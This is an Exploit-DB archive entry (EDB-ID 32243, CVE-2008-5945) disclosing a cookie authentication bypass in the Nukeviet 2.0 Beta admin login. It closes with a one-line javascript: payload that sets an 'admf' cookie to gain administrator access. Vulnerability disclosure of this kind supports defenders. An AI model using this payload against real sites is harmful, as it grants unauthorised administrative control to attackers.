Nukeviet 2.0 - 'admin/login.php' Cookie Authentication Bypass Vulnerability

2008-08-13T00:00:00
ID EDB-ID:32243
Type exploitdb
Reporter Ciph3r
Modified 2008-08-13T00:00:00

Description

Nukeviet 2.0 'admin/login.php' Cookie Authentication Bypass Vulnerability. CVE-2008-5945 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/30681/info

Nukeviet is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application.

Nukeviet 2.0 Beta is vulnerable; other versions may also be affected. 

javascript:document.cookie = "admf=1; path=/";